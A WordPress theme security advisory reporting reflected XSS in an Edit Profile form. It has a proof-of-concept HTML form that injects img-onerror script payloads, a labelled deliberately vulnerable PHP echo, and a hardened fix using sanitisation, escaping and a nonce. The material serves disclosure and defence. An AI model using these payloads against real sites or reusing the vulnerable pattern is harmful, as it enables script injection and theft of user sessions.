The theme does not properly sanitise and escape several of the fields in the Edit Profile page, leading to Reflected Cross-Site Scripting issues.
<html>
  <body>
    <form action="https://example.com/edit_profile/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nickname" value=""><img src=x onerror=alert(document.domain)>" />
      <input type="hidden" name="email" value=""><img src=x onerror=alert(document.cookies)>" />
      <input type="submit" value="Save" />
    </form>
  </body>
</html>

https://www.youtube.com/watch?v=BeDZCyi7csc
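The root cause is that submitted profile values are written back into input attributes without sanitisation or escaping. The following is an added example, not the affected theme's code: a hypothetical template function that re-displays the nickname and email fields, first in the vulnerable shape the advisory describes and then hardened with WordPress's sanitize_text_field(), sanitize_email(), esc_attr() and a nonce check (the function and nonce names are assumptions).

```php
<?php
// Constructed example of a theme template that re-displays submitted
// profile fields. Not the affected theme's code; names are hypothetical.

// VULNERABLE: the raw request value is echoed into an attribute. A value
// that starts with "> closes the attribute and injects markup, which is
// exactly what the PoC form above submits.
function render_nickname_vulnerable() {
    $nickname = isset( $_POST['nickname'] ) ? $_POST['nickname'] : '';
    echo '<input type="text" name="nickname" value="' . $nickname . '" />';
}

// HARDENED: sanitise on input, escape on output, and verify a nonce so the
// form cannot be submitted from a third-party page (the PoC relies on a
// cross-site POST that carries no nonce).
function render_profile_fields_hardened() {
    $nickname = '';
    $email    = '';

    if ( 'POST' === ( $_SERVER['REQUEST_METHOD'] ?? '' ) ) {
        // Dies with a 403-style error unless the request carries a valid
        // nonce generated by wp_nonce_field() below.
        check_admin_referer( 'theme_edit_profile', 'theme_edit_profile_nonce' );

        // Sanitise on input: strips tags, octets, line breaks and extra
        // whitespace (text) or everything that is not a valid email char.
        $nickname = sanitize_text_field( wp_unslash( $_POST['nickname'] ?? '' ) );
        $email    = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
    }

    // Escape on output: esc_attr() encodes ", <, > and & so the value can
    // never terminate the attribute, even if sanitisation is bypassed upstream.
    echo '<input type="text" name="nickname" value="' . esc_attr( $nickname ) . '" />';
    echo '<input type="email" name="email" value="' . esc_attr( $email ) . '" />';

    // Emits the hidden nonce field that check_admin_referer() verifies.
    wp_nonce_field( 'theme_edit_profile', 'theme_edit_profile_nonce' );
}
```

Both escaping and the nonce matter: escaping removes the injection, the nonce removes the cross-site delivery vector the PoC form depends on.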
Veshraj Ghimire
Yes
2022-05-16
2022-05-17